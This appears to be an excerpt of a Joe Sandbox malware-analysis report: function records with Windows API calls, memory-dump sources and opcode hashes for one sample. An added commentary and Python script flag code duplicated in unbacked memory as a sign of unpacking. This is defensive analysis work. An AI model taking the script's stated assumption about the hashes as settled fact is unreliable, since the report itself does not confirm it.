                                                                                    • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                    • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                    • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                    • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(00400000,00473388,?), ref: 004733C5
                                                                                    • UnregisterClassW.USER32(00473388,00400000), ref: 004733EE
                                                                                    • RegisterClassW.USER32(0065F688), ref: 004733F8
                                                                                    • SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 00473443
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4025006896-0
                                                                                    • Opcode ID: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction ID: a8c172639951b3e6cb5da7468db87f3e5ba31e7f9e45713803e63bcfa106701e
                                                                                    • Opcode Fuzzy Hash: 77c002dd57727ae1c120746f698cf05d15210d6afcb35098894f7f7bfabb7748
                                                                                    • Instruction Fuzzy Hash: 100188717001046BCB10FF68ED81FDB739AE718306F109226F908E73A1DABADD558759
                                                                                    APIs
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 2950233615-0
                                                                                    • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                    • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                    • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                    • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 005A3D8F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 005A3DD1
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005A3DEB
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005A3EA5,?,?,?,00000000), ref: 005A3E13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Visible
                                                                                    • String ID:
                                                                                    • API String ID: 2967648141-0
                                                                                    • Opcode ID: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction ID: a7e9761be64e8251a726e41e5ea799dd36543e273c62785c0243dde29f2c5ab3
                                                                                    • Opcode Fuzzy Hash: 3701598597631481a4bebe85878359a59fd4de1d73864697aee8f0662b462547
                                                                                    • Instruction Fuzzy Hash: 50115670205144AFDB10EB29D889FA97FD9BB45356F448595F844CF361C774EE80C790
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004F9151
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,?,?,?,00000000), ref: 004F915A
                                                                                    • GlobalFindAtomW.KERNEL32(00000000,?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,?,?,?,00000000), ref: 004F916F
                                                                                    • GetPropW.USER32(00000000,00000000), ref: 004F9186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2582817389-0
                                                                                    • Opcode ID: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction ID: 6cdfd07cd157af09d6636e7e024685bcdc2838eed951bc29520a0badc25c7c68
                                                                                    • Opcode Fuzzy Hash: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction Fuzzy Hash: 32F0306260021666B72477B6AE85AFB328C8A057A5740297FFA01D7216D57CCC8283BD
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction ID: 8c410b6b5025aaf122e9bdc0c1ce3c8724fef5309a0de07dabf959826b4bab6c
                                                                                    • Opcode Fuzzy Hash: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction Fuzzy Hash: 40E0E57230C2410EA32032AE18866BE594BDA97394F35097BF180C1216CD088C968136
                                                                                    APIs
                                                                                    • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                    • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                    • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
• String ID:
• API String ID: 3089488326-0
APIs
• GetCurrentProcess.KERNEL32(00000008), ref: 0063DA4D
• OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0063DA53
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 0063DA75
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 0063DA86
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
APIs
• GetDC.USER32(00000000), ref: 004E43D9
• SelectObject.GDI32(00000000,058A00B4), ref: 004E43EB
• GetTextMetricsW.GDI32(00000000), ref: 004E43F6
• ReleaseDC.USER32(00000000,00000000), ref: 004E4407
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MetricsObjectReleaseSelectText
• String ID:
• API String ID: 2013942131-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 10016C06
• GetCurrentThreadId.KERNEL32 ref: 10016C15
• GetCurrentProcessId.KERNEL32 ref: 10016C1E
• QueryPerformanceCounter.KERNEL32(?), ref: 10016C2B
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 00CE6BDD
• GetCurrentThreadId.KERNEL32 ref: 00CE6BEC
• GetCurrentProcessId.KERNEL32 ref: 00CE6BF5
• QueryPerformanceCounter.KERNEL32(?), ref: 00CE6C02
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
• SendNotifyMessageW.USER32(?,00000496,00002711,-00000001), ref: 006461BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageNotifySend
• String ID: HW[$MS PGothic
• API String ID: 3556456075-2635353643
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
• Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
• String ID: .exe
• API String ID: 2188046178-4119554291
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC0
• GetLastError.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: .tmp
• API String ID: 1375471231-2986845003
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0064EC72
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction ID: 8b2991d2d1f953f99e0989ce018fc3471add5941c41498d69d44fc2df87f3202
                                                                                    • Opcode Fuzzy Hash: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction Fuzzy Hash: A321A234A043499FDB04EBA4DC91EEEBBF6FF49304F64447AE500E7291DA799904C754
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10016D88
                                                                                    • ___raise_securityfailure.LIBCMT ref: 10016E70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: r<e
                                                                                    • API String ID: 3761405300-3210016143
                                                                                    • Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction ID: a67c13fa0676d0ded6a491c3c047187990066a390ac77e1bb819cc9b9643fb58
                                                                                    • Opcode Fuzzy Hash: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction Fuzzy Hash: E621B0B5A08328DBF705CF28DDE5E647BB4FB09704F10D12AE5049B2A1E3B0D685CB45
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CE6D5F
                                                                                    • ___raise_securityfailure.LIBCMT ref: 00CE6E47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                    • String ID: r<e
                                                                                    • API String ID: 3761405300-3210016143
                                                                                    • Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction ID: ab00a3611c5fd8ed0a2b33da80d7814ed93805dc9c4decfa6144dfacafea3fa9
                                                                                    • Opcode Fuzzy Hash: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
                                                                                    • Instruction Fuzzy Hash: DD21EFB4618328DBF714CF29DDE1E647BA4BB09704F10D12AE6149B3A0E3B0DA84CF44
                                                                                    APIs
                                                                                      • Part of subcall function 005FA9A8: GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                      • Part of subcall function 005FA9A8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • SetForegroundWindow.USER32(?), ref: 0064FAE0
                                                                                    Strings
                                                                                    • Restarting Windows., xrefs: 0064FAB7
                                                                                    • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0064FB17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                    • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3179053593-4147564754
                                                                                    • Opcode ID: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction ID: d4bf9f36ef96bf7cd5cd4c99b625b6b1cd4e930e58df0cf614d5cda783460847
                                                                                    • Opcode Fuzzy Hash: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction Fuzzy Hash: 341182346002449FEB04EB94E896FD837E6EB46304F5150BAF804AB3E2CB78AD41C716
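                                                                                     The two records above for IsProcessorFeaturePresent(00000017) / ___raise_securityfailure are the MSVC CRT's stack-cookie failure handler (PF_FASTFAIL_AVAILABLE is 0x17, checked before __fastfail), i.e. compiler runtime code rather than sample logic. What makes them worth a second look is that the same Opcode ID (450f55da…) occurs once in the region at 10000000 ("based on PE: true") and once in the region at 00CD0000 ("based on PE: false"), with different Instruction IDs. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function records in the shape shown on this page and flags any Opcode ID that is present both in a PE-backed region and in one that is not, since the unbacked copy is where an unpacked or manually mapped image would sit. The sample input is constructed from the entries above with the Associated and Snapshot lines dropped; the reading that the Opcode ID hashes the opcode sequence while the Instruction ID also covers operands, so relocated copies of one function share the former but not the latter, is an assumption about how the plugin computes those hashes.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the report's function records above
# (three records, Associated/Snapshot lines dropped; hashes copied from this page).
SAMPLE = """\
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10016D88
• ___raise_securityfailure.LIBCMT ref: 10016E70
Strings
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
• Instruction ID: a67c13fa0676d0ded6a491c3c047187990066a390ac77e1bb819cc9b9643fb58
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CE6D5F
• ___raise_securityfailure.LIBCMT ref: 00CE6E47
Strings
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• Opcode ID: 450f55da5f99c408a49f7ed2eee0c8ae3ebd1ba68c36369af010e05196f36eeb
• Instruction ID: ab00a3611c5fd8ed0a2b33da80d7814ed93805dc9c4decfa6144dfacafea3fa9
APIs
  • Part of subcall function 005FA9A8: GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
• SetForegroundWindow.USER32(?), ref: 0064FAE0
Strings
• Restarting Windows., xrefs: 0064FAB7
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$CurrentForegroundOpenTokenWindow
• Opcode ID: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
# "Name.MODULE(args), ref: ADDR" or "Name.MODULE ref: ADDR"
API_RE = re.compile(r"^(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+).*?ref: (?P<ref>[0-9A-Fa-f]+)")


def parse_records(text):
    """Split the plugin's function listing into one dict per 'APIs' record."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            if line == "APIs":                 # every record starts with its APIs header
                rec = {"apis": [], "refs": [], "strings": [], "subcalls": 0,
                       "file": None, "offset": None, "pe_backed": None}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            if body.startswith("Part of subcall function"):
                rec["subcalls"] += 1           # a callee's API, not this function's
                continue
            m = API_RE.match(body)
            if m:
                rec["apis"].append(m["name"])
                rec["refs"].append(int(m["ref"], 16))
        elif section == "Strings":
            rec["strings"].append(body.rsplit(", xrefs: ", 1)[0])
        elif section == "Memory Dump Source":
            m = SOURCE_RE.search(body)
            if m:                              # 'Associated:' lines carry no offset, skipped
                rec["file"] = m["file"]
                rec["offset"] = int(m["offset"], 16)
                rec["pe_backed"] = m["pe"] == "true"
        elif section == "Similarity":          # "Opcode ID: ..." -> rec["opcode_id"]
            key, _, value = body.partition(": ")
            rec[key.lower().replace(" ", "_")] = value
    return records


def duplicate_opcode_groups(records):
    """Opcode IDs that occur in more than one record, mapped to those records."""
    groups = defaultdict(list)
    for r in records:
        if r.get("opcode_id"):
            groups[r["opcode_id"]].append(r)
    return {oid: rs for oid, rs in groups.items() if len(rs) > 1}


def flag_unbacked_copies(records):
    """(opcode_id, pe_backed_offset, unbacked_offset) for every opcode sequence seen
    both in a region mapped from a PE image and in one that is not."""
    hits = []
    for oid, rs in duplicate_opcode_groups(records).items():
        backed = sorted({r["offset"] for r in rs if r["pe_backed"] is True})
        unbacked = sorted({r["offset"] for r in rs if r["pe_backed"] is False})
        hits.extend((oid, b, u) for b in backed for u in unbacked)
    return hits


if __name__ == "__main__":
    for oid, backed, unbacked in flag_unbacked_copies(parse_records(SAMPLE)):
        print(f"opcode {oid[:12]}... PE-backed at {backed:08X}, unbacked copy at {unbacked:08X}")
```

                                                                                     Run against a full listing (copy the function records into a file and pass its text to parse_records), the unbacked regions it returns are the dumps to pull first, and the refs it collects for each record give the addresses to diff between the two copies.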
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,lF,004085A0,00000000,?,lF), ref: 00408632
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
